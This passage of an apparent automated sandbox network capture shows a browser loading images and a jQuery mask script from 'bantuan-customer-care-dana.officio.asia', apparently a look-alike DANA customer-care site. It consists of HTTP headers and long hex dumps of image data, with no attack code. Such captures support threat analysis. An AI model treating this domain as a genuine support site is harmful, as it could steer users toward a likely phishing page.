                                                  Data Ascii: I~7Rjl{x)[YOguygQ6{Ogsv>~9Rr+x?ox+epvHnfD@~?Accuv"zc7e+PgK*KmaX^)3t*ctzy|b[g$u+Dl%W(u&ZS
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 6c 43 98 e4 53 36 8a 7d db 51 4e fb 8a b3 c9 00 05 1d 2c a2 71 39 c2 06 9f ee b7 ff d5 61 1c ed 18 b9 65 bc f4 68 27 be 06 b0 f8 8a 6f 8f b2 d9 c2 d1 84 a5 98 27 4a 8b dd b5 d6 54 18 61 88 cf 8e 96 9a 7e d4 83 2f 53 ac 30 40 9d dd 35 d7 54 10 61 85 8f 99 3f da 9b 8f 7e a2 6a 0c 45 9f 5b 4e 64 d5 1c 81 14 ff 7c f4 3c bc 52 84 31 4f 88 0e ed 69 1d 53 14 37 f8 82 f4 51 df 5e 8a b0 32 cc d3 4e 93 dd 2d a0 a9 00 c2 28 9f ec dd bd bd 70 4a eb ca e2 2c d3 af 3d ad 63 87 b0 c4 47 c5 c6 da 9f a4 54 1f 69 85 38 fd ee 3c 95 55 93 07 61 93 cf b8 5b da 87 94 ee 7c 2f e0 a5 cb 8d 67 1c 6a f2 60 f1 15 5f 97 ba d3 7f e9 c2 b2 98 a5 89 36 bb 5b 43 53 36 ee f0 8f a5 6f ab 50 8e 70 41 8a 39 a2 44 ec 6e 0f 4d 19 10 c6 f8 98 95 d2 3f a8 3c 71 a8 0d 16 e8 26 6c 73 a3 68 4a 45
                                                  Data Ascii: lCS6}QN,q9aeh'o'JTa~/S0@5Ta?~jE[Nd|<R1OiS7Q^2N-(pJ,=cGTi8<Ua[|/gj`_6[CS6oPpA9DnM?<q&lshJE
                                                  2024-10-13 17:33:28 UTC339INData Raw: 4a 84 08 dd 84 31 f1 e3 dd b2 62 e5 96 98 6c 59 a7 14 09 2c 62 4c b0 cc 32 73 ac 92 3e ae 16 6a 6f 13 d4 1e 26 7e 3c d4 d1 43 1b 1e 1a 68 21 88 81 60 20 8f db 43 ed f8 9d 1f d9 f1 9b 2d 89 5a 58 6c 32 cf 2a 69 e6 19 67 83 34 09 32 76 57 ba da d4 a2 b0 9e 24 40 3d 3e 0c 42 74 d0 8c 0f 0f 1e 7c f8 f0 e2 c1 44 60 4b 6e d9 df 59 eb 96 fb 9d 21 4d 8a 24 49 d2 a4 49 b2 c8 34 eb 58 24 89 b9 23 07 a1 72 68 61 ed 24 2b 1e 0f 75 84 a8 c3 8f 67 87 25 db 16 56 d6 2e 29 2c d2 24 d9 60 9d 4d d2 e0 c0 d1 a7 8d fc 7f 14 8e 09 88 65 e1 68 00 00 00 00 25 74 45 58 74 64 61 74 65 3a 63 72 65 61 74 65 00 32 30 32 32 2d 31 30 2d 33 30 54 31 38 3a 31 33 3a 33 39 2b 30 30 3a 30 30 e2 93 db 58 00 00 00 25 74 45 58 74 64 61 74 65 3a 6d 6f 64 69 66 79 00 32 30 32 32 2d 31 30 2d 33
                                                  Data Ascii: J1blY,bL2s>jo&~<Ch!` C-ZXl2*ig42vW$@=>Bt|D`KnY!M$II4X$#rha$+ug%V.),$`Meh%tEXtdate:create2022-10-30T18:13:39+00:00X%tEXtdate:modify2022-10-3


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  17192.168.2.449769172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:28 UTC644OUTGET /ast/img/load_spin.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:28 UTC694INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:28 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 5078
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:22:56 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7075
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tiea6UiHAXAhB7XATYtwSTDEXBjSq4k59gnsipezwTnNjifF58Yp%2FpKzvfx3GCeWC1950BXojIPB6wPOlXQoWPWd5rc5ZfYHhaN%2BrkSQK8eeQt1lmsfwIt1YJ5Ipo%2FZd%2BBYEaV0pXptA%2B0ngMRuGLXeetYPMQ44cGi0%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d21132b89f67280-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:28 UTC675INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 04 00 00 00 07 51 66 15 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 ff 87 8f cc bf 00 00 00 07 74 49 4d 45 07 e6 0b 01 06 0c 06 82 fe 92 c0 00 00 12 aa 49 44 41 54 78 da ed 9d f9 7b 14 d7 95 86 df 5a 7a 51 ab b5 81 5a 3b 20 c9 80 43 8c 6d c6 78 89 6d 12 1b 18 2f f3 78 e6 c9 3f 3b 36 4e 66 1c c7 4e e2 cc 04 c6 76 12 b0 8d 6d 04 02 24 a1 0d 21 a9 5b ea 56 57 57 cd 0f 75 fb f6 ad d6 d6 6b 55 83 ee a7 07 d1 dd 52 dd 7b ce f9 74 ce b9 e7 2e 55 06 4f 01 bc bd 3e 34 b0 30 b1 88 11 27 8e 01 38 94 28 52 c0 a1 b4 df 25 9d 8f 0e 96
                                                  Data Ascii: PNGIHDRQfgAMAa cHRMz&u0`:pQ<bKGDtIMEIDATx{ZzQZ; Cmxm/x?;6NfNvm$![VWWukUR{t.UO>40'8(R%
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 1f 9b a4 18 20 c3 30 63 64 e8 11 03 e5 ea 21 82 87 c3 3a f7 f9 89 c5 f2 58 2c 6c 03 85 da 9f 34 59 8a 57 f8 88 8b 0c 60 06 02 94 4d 0c 8b 1c 33 dc e0 6b 6e f3 80 b5 6a 1a ea 15 78 17 4d 3e 35 c3 9c 60 82 63 d8 c2 d3 d4 81 b3 cb 36 73 fc c8 7c 39 dd 87 69 a4 d0 fa 92 86 e9 e6 35 3e e2 45 d2 82 0c 5b 86 27 9b 3c 33 7c c1 17 7c cf 5a eb c5 dc 45 4d 37 23 3c c7 14 03 58 92 96 8a af 14 58 e0 47 e6 c3 f6 94 50 fa 51 3c e3 75 3e e4 3c 29 0c c5 2f 62 d8 14 79 c0 df f8 9c 7f f2 b8 fd c2 05 a8 e9 66 94 d3 4c d0 8b b9 ab c8 dc 61 81 9f c3 0d 5f 6d ef 43 2a df c5 2b 7c c0 79 ba 04 19 b6 20 03 96 f8 86 3f f0 2d cb 21 8a 45 15 2d 69 c6 79 8e 51 52 c2 47 2a 75 4b 81 47 dc 65 a9 1c 3a db 2d 59 9b db 17 4a c7 b9 c0 fb bc 10 f0 8c 18 31 b6 b9 c5 e7 fc 8d b9 e8 6a 66 85 16
                                                  Data Ascii: 0cd!:X,l4YW`M3knjxM>5`c6s|9i5>E['<3||ZEM7#<XXGPQ<u><)/byfLa_mC*+|y ?-!E-iyQRG*uKGe:-YJ1jf
                                                  2024-10-13 17:33:28 UTC1369INData Raw: b0 18 96 b5 b9 c7 03 56 1a ed 46 a3 56 1c 9c 43 fa 49 cb d1 d5 13 1e f8 2f 34 da 89 7d 08 11 93 25 c7 a5 fd 8b cc b2 a3 e9 68 3f 0e f2 90 3e b9 89 01 16 ab ef ad a0 d1 1e ec 49 88 f0 8f 7e f1 d6 20 cf bc 1e 5d 85 83 fd 3d a4 57 59 f9 5a d2 c5 60 58 d8 83 10 e1 1f 7d e2 ad 41 5e 17 83 e1 61 3f 0f f1 ef 28 e5 63 99 bc a6 23 2c ec 22 c4 03 b0 e5 3e 3c 83 3c ab 51 0b 79 94 b0 b7 87 a4 e5 64 3b ac 6a ff 08 13 55 84 08 ff 48 4b 06 b4 7f 84 8c bd 3c a4 4b f1 8f 35 0a da 3f c2 44 80 10 b1 15 2e 25 3f d8 51 ef ef a6 11 06 76 7b 48 5c 19 5f ad 6b ff 08 1b bb 09 49 0a 06 0c 4a ac 47 2d de d1 83 42 88 98 70 af d4 e7 5b 7a 23 5c f8 a8 f6 90 b8 dc 2a ea b1 a9 37 33 84 8f 6a 42 12 32 60 39 e5 fb 0b 6a 84 09 49 88 08 58 95 84 be 45 51 fb 47 f8 08 7a 88 1a b0 b2 8d 6d 85
                                                  Data Ascii: VFVCI/4}%h?>I~ ]=WYZ`X}A^a?(c#,"><<Qyd;jUHK<K5?D.%?Qv{H\_kIJG-Bp[z#\*73jB2`9jIXEQGzm
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 2d 7f 44 71 74 29 91 75 79 9f 3c 53 63 e0 e1 f8 7f b8 f5 65 f7 3a 93 8f 28 13 bf e3 be f2 e1 39 2e 1d 65 2f 91 de 31 a0 9c 5d f6 70 fc 7b 63 d4 3b d8 6a 6c 34 50 e4 5b e6 95 be ce 73 d9 17 e6 e8 51 22 53 f9 f1 c0 c6 74 c7 3f 8b 56 ff d8 b7 6e 42 44 17 db dc 60 51 e9 ef 1c ef d3 a7 08 78 44 20 07 ba 19 ba 15 e5 1d f2 8d 1a a2 01 0f 11 2c 6c f2 3f ca 94 a3 c7 59 fe 9d 21 45 c8 23 00 a1 69 17 a3 01 ef 28 92 ab 3f 99 97 d1 50 c8 12 1d 3d e1 cf 8a 97 78 9c e4 b7 9c 54 04 7d c6 21 b4 4c 33 4a 52 bc 31 80 22 d9 c6 e9 68 f8 5e ef a2 b3 35 be e0 a1 42 c9 30 bf e5 17 fe cb 67 9b 14 a9 5f 3f e3 81 d3 ca 05 36 1a 19 5b 55 d0 c4 5d 7f e4 5f c8 25 ce 62 63 61 61 11 23 cf e7 dc 68 4e a8 4e 87 5c 9c 1d 64 08 bf da f0 ff 6d b2 de 8c 77 34 77 65 45 b0 04 6f f2 32 71 41 89
                                                  Data Ascii: -Dqt)uy<Sce:(9.e/1]p{c;jl4P[sQ"St?VnBD`QxD ,l?Y!E#i(?P=xT}!L3JR1"h^5B0g_?6[U]_%bcaa#hNN\dmw4weEo2qA
                                                  2024-10-13 17:33:28 UTC296INData Raw: db d8 51 46 e8 24 59 24 02 c4 18 f4 30 c4 29 a6 39 cd 18 c7 48 93 22 49 0c 03 43 e4 15 37 10 9e fc 7c 51 a4 48 81 3c db 6c f0 98 25 e6 78 c4 12 eb ca a3 06 3a 54 f9 4e 94 49 62 57 1d 61 93 a0 8b 14 bd f4 d2 43 37 5d a4 38 46 37 71 5c 0a 38 ec 90 25 cb 3a 5b e2 6b 9b 6d f2 e4 95 47 70 74 ba ca 1d 2e 9d 82 03 f6 0a 1b 18 1c ba 9d f8 69 51 f4 69 91 73 1f ec c5 c1 d3 ad d2 ff 03 a7 df fc 4c 5a 4c 97 a8 00 00 00 25 74 45 58 74 64 61 74 65 3a 63 72 65 61 74 65 00 32 30 32 32 2d 31 30 2d 33 30 54 31 38 3a 31 33 3a 35 38 2b 30 30 3a 30 30 82 8b d9 6b 00 00 00 25 74 45 58 74 64 61 74 65 3a 6d 6f 64 69 66 79 00 32 30 32 32 2d 31 30 2d 33 30 54 31 37 3a 32 32 3a 33 32 2b 30 30 3a 30 30 c0 99 ef 14 00 00 00 28 74 45 58 74 64 61 74 65 3a 74 69 6d 65 73 74 61 6d 70 00
                                                  Data Ascii: QF$Y$0)9H"IC7|QH<l%x:TNIbWaC7]8F7q\8%:[kmGpt.iQisLZL%tEXtdate:create2022-10-30T18:13:58+00:00k%tEXtdate:modify2022-10-30T17:22:32+00:00(tEXtdate:timestamp


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  18192.168.2.449773104.21.61.834435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:28 UTC384OUTGET /ast/img/dana_text.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:28 UTC693INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:28 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 10588
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:22:16 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7076
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BTBocNeZ1TMspChsvp2pqwgSny%2FzVlNVLHAYFj3TgiXaGgFcK24%2B%2BW5JdnzQLqhrmijeRPmAcqZRFoQ8F5jfbcyUxU7AEew9MWQdBlhf1n7T2A%2BimsfNAA6sTwCjKaQW38JAMRpkPGyVGuN3TXC3fTh4yQhp2kanHxg%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d21132f5d0b7c9a-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:28 UTC676INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 e0 00 00 00 76 08 06 00 00 00 10 9c 40 7f 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 20 00 49 44 41 54 78 9c ed 9d 7b 78 9c 57 7d e7 bf bf f3 ce 68 a4 91 c6 92 6d c9 b2 62 3b 11 89 21 89 53 6e b1 21 40 d2 20 3f dd 66 cb bd 85 75 d2 3e dd 96 6b 6f cb 25 d0 74 81 c0 52 14 1a 68 a1 85 2e 6d b9 b4 0b 5d 5a 1a 58 64 9a 2e 94 72 ed 62 71 29 2d d4 22 0d c5 4e 1a 2b 8e 82 65 c9 b2 64 59 b7 91 e6 f2 be e7 bb 7f 9c 77 ec b1 e2 8b 64 cd 79 e7 7d 35 e7 f3 3c 7a 6c 49 af e6 9c f7 bc e7 3d bf f3 bb 1e c0 e1 70 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38 1c eb 8a 81 81 01 6f 72 72 32 47 72 c3 a9 53 a7 36 90 bc d8 57 fb 2a 7e 77 b1 6b 57 d4 ce
                                                  Data Ascii: PNGIHDRv@sRGBsBIT|d IDATx{xW}hmb;!Sn!@ ?fu>ko%tRh.m]ZXd.rbq)-"N+edYwdy}5<zlI=p8p8p8p8orr2GrS6W*~wkW
                                                  2024-10-13 17:33:28 UTC1369INData Raw: ae 77 67 56 00 71 56 88 93 64 59 44 4e 90 9c 10 91 c3 41 10 7c c5 f3 bc ef 00 98 1f 1a 1a 2a ed de bd db bd 6c f1 46 48 aa d1 d1 d1 a6 f6 f6 f6 6c 2e 97 7b 8a d6 fa 76 11 79 9e 88 ec 80 11 c2 1e cc 06 4d ad f0 33 2b 73 44 03 28 00 18 07 70 4c 6b fd 65 a5 d4 17 4e 9f 3e 3d b9 71 e3 c6 25 98 85 58 5b b8 27 c7 ea 90 03 07 0e 78 7d 7d 7d e9 85 85 85 b6 b6 b6 b6 a7 02 b8 1d c0 8d 00 ae 04 b0 09 a1 42 50 f5 75 29 aa e7 40 1e c0 71 92 47 45 e4 7e 00 df 04 70 0a 40 31 bc 26 70 6b 44 7d 09 15 bc d4 e4 e4 64 a6 ab ab ab 1d c0 ad 30 73 e0 1a 92 db 45 24 87 73 e7 c0 8a 3e 16 e6 f9 6b 92 33 22 72 1c c0 8f 00 fc 0d 80 7f 9b 98 98 58 1c 1d 1d ad bf 8c 38 76 ec 58 0b c9 ef 73 7d 10 90 9c 20 f9 1f 41 10 bc b3 54 2a ed 9e 9b 9b db 4c b3 4b 76 c4 07 a1 31 15 ed 20 79 1b c9
                                                  Data Ascii: wgVqVdYDNA|*lFHl.{vyM3+sD(pLkeN>=q%X['x}}}BPu)@qGE~p@1&pkD}d0sE$s>k3"rX8vXs} AT*LKv1 y
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 90 fc fe d2 d2 d2 cb b3 d9 ec 89 46 5e 17 42 cd b7 0b c0 5f 92 7c e1 b2 33 00 d6 33 1a c0 07 01 bc 0f c0 65 6b c2 95 fa 9a 8e f3 93 26 f9 c6 5c 2e f7 37 00 b6 d1 55 d1 aa 20 24 db 00 fc 06 80 0f a3 41 84 2f 60 0e 24 21 79 1d 8c 39 fa 19 34 b5 d4 1b 8e 50 f8 6e 02 70 2f 8c 00 6e a8 71 10 91 67 67 b3 d9 fb 01 dc 70 e0 c0 81 86 b4 86 84 9a ef 36 00 7f df 60 c2 17 30 b2 f3 2e ad f5 9f 00 e8 e1 65 e6 0b 37 6a 1e f0 aa 08 b5 9e ef 03 f8 a5 a1 a1 a1 d1 46 3f 71 89 64 5b 98 df fb 87 30 b9 9d 0d 47 38 27 8e 02 78 19 80 87 e3 74 c2 8a 6d 42 e1 9b 83 c9 a1 ff 1d 18 f3 7c 23 42 00 0f 14 8b c5 3b 32 99 cc 63 8d 14 17 10 2a 23 3d 00 3e 0d a0 af ce dd a9 27 01 80 fb 00 bc 55 44 26 56 fb c7 ce 07 bc 02 42 ad e7 26 00 9f dd bd 7b f7 d5 8d ec ff 23 d9 1c 04 c1 6d 4a a9 3f
                                                  Data Ascii: F^B_|33ek&\.7U $A/`$!y94Pnp/nqggp6`0.e7jF?qd[0G8'xtmB|#B;2c*#=>'UD&VB&{#mJ?
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 00 a6 01 94 00 e8 ca da 01 00 bd bd bd 32 35 35 95 ea ec ec 6c 83 59 7c 6f 82 79 fe 37 c3 e4 af d7 8b 0f 4e 4e 4e f6 6f d9 b2 e5 82 66 c8 b8 42 32 a3 b5 7e 87 52 ea 5d a8 9f 00 9e 27 f9 2d 11 f9 36 80 ef 01 18 01 30 07 33 37 18 7e c9 e8 e8 a8 6c df be bd 22 88 37 fa be 7f 8d 52 ea 16 a5 d4 2d 30 72 a2 5e 73 58 c3 9c a2 f6 e5 f3 96 2a 25 99 25 f9 c3 95 9c 46 7c 99 7c 8c e6 48 bf 9a 40 93 93 ea 91 6c 99 9f 9f df 42 f2 69 24 7f 8d e4 a7 48 96 2d de c7 4a d0 24 df c4 84 17 e8 a7 19 df ff c1 fa 1d aa 7e 3f c9 3b 48 5e 4d b2 fd e0 c1 83 69 ae 30 d5 8b a4 22 d9 4c b2 b3 54 2a 3d 93 e4 3b b4 d6 ff 51 a7 fb 58 22 99 c8 b4 24 9a 83 d5 ff aa 4e e3 56 0a db 7e 29 c9 2b 27 27 27 73 34 66 bc d5 ce 81 ad 24 6f 0e 82 e0 bd 24 27 eb 71 23 5a eb 71 92 3f c5 04 a6 2a 92 ec
                                                  Data Ascii: 255lY|oy7NNNofB2~R]'-6037~l"7R-0r^sX*%%F||H@lBi$H-J$~?;H^Mi0"LT*=;QX"$NV~)+'''s4f$o$'q#Zq?*
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 0a 11 1c 37 48 f2 f1 52 a9 f4 4e 00 27 63 30 07 96 00 fc 5f ad f5 a7 60 bf 8e fb f3 b7 6e dd ba 21 e6 73 60 13 c9 a7 44 d0 ce ff 01 f0 67 00 16 23 68 eb a2 e4 72 b9 d3 85 42 e1 03 24 bf 6f bb 2d a5 d4 0b 7a 7b 7b cf 06 e3 35 8a 06 5c 21 0c c2 f9 59 46 17 98 f5 1b 4c 40 4e f0 cc cc cc c6 28 72 7f 83 20 f8 03 c6 2c 2f 96 c6 e7 f5 a0 ed 7b 27 f9 2e c6 f7 b0 76 a1 09 86 7b dc f2 18 94 49 fe 3c 63 94 17 4b a3 f9 3f 39 2c 9a 61 9b 67 31 a6 73 80 26 42 f8 85 b4 ec 13 0d c7 f9 e9 8c d1 ba 48 63 01 fc 25 da cf 9a 39 9d cf e7 af a8 b4 1b 9b 01 88 8a 1b 6e b8 a1 04 e0 db 5a eb 3f 88 a8 c9 df 9b 9b 9b eb 60 cc 83 b1 da db db 5b 44 e4 8a 4b 5f b9 26 66 cb e5 f2 27 00 14 2d b7 b3 2a 0e 1f 3e 7c 1a a6 ee b5 55 48 de 3a 32 32 12 db c5 b7 5c 2e f7 c2 d4 d1 b5 d9 ce 3f 4c
                                                  Data Ascii: 7HRN'c0_`n!s`Dg#hrB$o-z{{5\!YFL@N(r ,/{'.v{I<cK?9,ag1s&BHc%9nZ?`[DK_&f'-*>|UH:22\.?L
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 00 b0 7d 64 e6 2c 62 1e 07 52 85 55 4d dd f3 bc 1c d0 c0 69 48 e7 61 ca 76 21 06 ad f5 33 77 ef de 1d 2b 01 bc 6f df 3e f8 be 9f 25 69 53 28 14 13 60 7e ae 2c be 45 d8 2d c6 d0 04 cb 95 86 2e 13 ab 27 35 29 a5 92 e0 ff ad 20 b0 7b 3a 4e 0b 62 76 2c e1 c4 c4 84 52 4a d9 4e 8f 2a c0 7e e1 a3 5a 61 35 5e 45 6b 9d 43 a3 47 41 2f 63 49 44 be 09 8b 13 44 44 ae 19 1f 1f 8f 95 f6 33 38 38 28 a9 54 ca b3 98 82 44 24 64 d7 1b 8e 41 40 d2 a6 00 56 88 9f 1b 02 41 10 d8 9c 97 84 49 f9 4b ca e2 1b c0 ee 02 1c ab 35 00 00 ba bb bb 05 f6 37 86 49 f0 ff 02 00 0a 85 82 d5 b9 aa 94 6a 19 19 19 71 41 58 15 42 33 f4 37 61 37 09 bf b3 a7 a7 27 76 63 ee fb be ed dd 78 52 16 5e 00 d0 36 cd 8f 71 c5 f3 ac cb 04 3d 34 34 64 bb 8d 35 63 33 17 3e ce 4c 4d 4d 89 d6 da f6 24 48 c4 46
                                                  Data Ascii: }d,bRUMiHav!3w+o>%iS(`~,E-.'5) {:Nbv,RJN*~Za5^EkCGA/cIDDD388(TD$dA@VAIK57IjqAXB37a7'vcxR^6q=44d5c3>LMM$HF
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 56 02 d8 69 c0 d1 13 c7 34 a4 20 88 95 67 c4 e1 68 08 a2 f0 01 c7 7e 4b d9 d3 d3 d3 0e e0 b9 96 9b 39 0a 60 3a 3c 1d 28 36 38 0d d8 01 00 9e e7 c5 6a 5e 3a 1c 8d 40 24 1a 70 9c 4f 43 3a 76 ec 58 8b d6 fa 57 00 6c b0 d9 4e 10 04 1f 87 89 fe 73 38 62 47 10 04 b1 b7 54 39 1c eb 8d 86 3e 0d a9 bf bf 5f 6d df be fd 5a a5 d4 bb 60 d7 54 1e 78 9e 37 24 22 b1 b3 f3 85 26 68 a7 fd 44 48 1c 7d c0 11 44 41 27 02 57 88 c3 11 25 0d 7d 1e f0 1b df f8 c6 36 ad f5 db 01 b4 59 6e aa 00 e0 b4 e5 36 d6 82 5b 75 22 24 8e 3e 60 87 c3 11 3d 91 e4 01 c7 51 03 26 d9 04 e0 26 00 2f 89 a0 b9 ff 07 20 7e 6a cf 59 9c 06 1c 21 71 d4 80 1d d1 11 16 7e a9 77 37 1c 31 a0 51 35 60 01 b0 0d c0 1f 02 88 42 1d f9 18 80 a5 08 da 59 35 55 85 38 9c 16 ec 70 44 40 4c 85 af 7b ff 23 a4 52 1f a3
                                                  Data Ascii: Vi4 gh~K9`:<(68j^:@$pOC:vXWlNs8bGT9>_mZ`Tx7$"&hDH}DA'W%}6Yn6[u"$>`=Q&&/ ~jY!q~w71Q5`BY5U8pD@L{#R
                                                  2024-10-13 17:33:28 UTC1369INData Raw: a2 b5 be 17 c0 57 45 24 f6 e6 94 4b 91 24 01 b9 0e 70 82 ce d1 90 14 8b 89 d2 53 ac be a7 95 e3 39 9d 06 bc 7a b4 d6 fa 2f f3 f9 fc 9f 8a c8 6c bd 3b 53 0b 6c e7 00 a7 52 a9 d8 1f 48 11 21 0d a7 05 24 c1 fd e0 88 84 4a 5a a9 23 c4 09 e0 d5 a1 01 7c 45 29 f5 ee 5c 2e b7 2e 6c 95 83 83 83 12 81 06 9c 18 01 bc 69 53 94 27 56 3a e2 4a 58 e2 d6 51 43 32 99 8c 1b d3 65 58 3f 0d 69 1d 51 49 37 fa 6f 00 c6 dd ae 7e 55 24 69 a3 b7 a6 b4 08 c7 f9 49 4a 04 74 48 62 0a 87 38 ec 50 28 14 ac ae 01 95 f7 c1 f9 80 57 46 00 e0 d3 8b 8b 8b af 03 70 3c 69 c5 36 ea 4c e5 b0 8c 24 e0 04 af 25 2a 3e af b8 43 12 e9 74 3a e2 13 54 1b 06 ee df bf bf de 7d 58 11 cd cd cd 91 4c 00 a7 01 5f 9a 32 80 8f 01 b8 33 9b cd 9e 70 c2 d7 e1 58 ff 38 0d b8 f6 14 8b 45 ee db b7 2f 11 3b 9b 42
                                                  Data Ascii: WE$K$pS9z/l;SlRH!$JZ#|E)\..liS'V:JXQC2eX?iQI7o~U$iIJtHb8P(WFp<i6L$%*>Ct:T}XL_23pX8E/;B
                                                  2024-10-13 17:33:28 UTC329INData Raw: cf 23 d4 fa 22 bc ad b5 30 0f e0 4d 00 7e 1a 40 73 d5 7a 07 00 d5 b2 ea 9c f7 5d 6b ed 01 08 2e 30 47 a0 b5 5e 02 30 3c 33 33 f3 f0 e6 cd 9b 75 c5 e9 25 00 9a 70 81 1d ff c8 c8 08 7a 7b 7b d7 74 37 2b f9 8c 0b 5c 53 d9 00 b0 ea ab f2 73 c4 6d 22 27 15 92 32 34 34 94 6a 6f 6f 57 3b 77 ee c4 c8 c8 88 00 a8 3c 0f 02 c0 f0 f0 f0 99 eb 97 57 b7 ea ed ed c5 c8 c8 c8 39 ff ef ed ed e5 fe fd fb fd db 6f bf 3d 49 fe 3f 00 90 83 07 0f a6 da db db 55 ad aa 78 3d f4 d0 43 5c 58 58 88 f5 58 90 54 30 81 99 02 40 2a cf b3 1a df f7 b9 73 e7 ce 73 fe 0c 00 86 87 87 65 d9 bc a9 7e 4f 83 a4 9d 22 d6 df df af de fd ee 77 2b 00 5e e5 9e 2e 46 f5 fc bf c0 ef 2b e3 11 c4 b9 c2 1e 49 35 34 34 e4 b5 b7 b7 9f 91 20 a9 54 4a 7a 7b 7b 35 42 f9 b0 fc 19 57 8f cf f2 71 f0 7d 9f b3 b3
                                                  Data Ascii: #"0M~@sz]k.0G^0<33u%pz{{t7+\Ssm"'244jooW;w<W9o=I?Ux=C\XXXT0@*sse~O"w+^.F+I544 TJz{{5BWq}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  19192.168.2.449775104.21.61.834435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:28 UTC385OUTGET /ast/jquery.mask.min.js HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:28 UTC694INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:28 GMT
                                                  Content-Type: text/javascript
                                                  Content-Length: 7920
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:21:48 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7076
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UYo8wTMThYPQ3WAwrcmQ6FBjWzRc62x2%2FQcnUxvEY0pnpysyhRnuY8msvpirvoJfgSLKHc5JWF2AUzROPIFb02S0shLb0e8oUFFl8oMjdN4saicSPwxalRAaAvSkCPslQQzrL%2FdrySWnbuazrHnpNswWijf9Vol2iWA%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
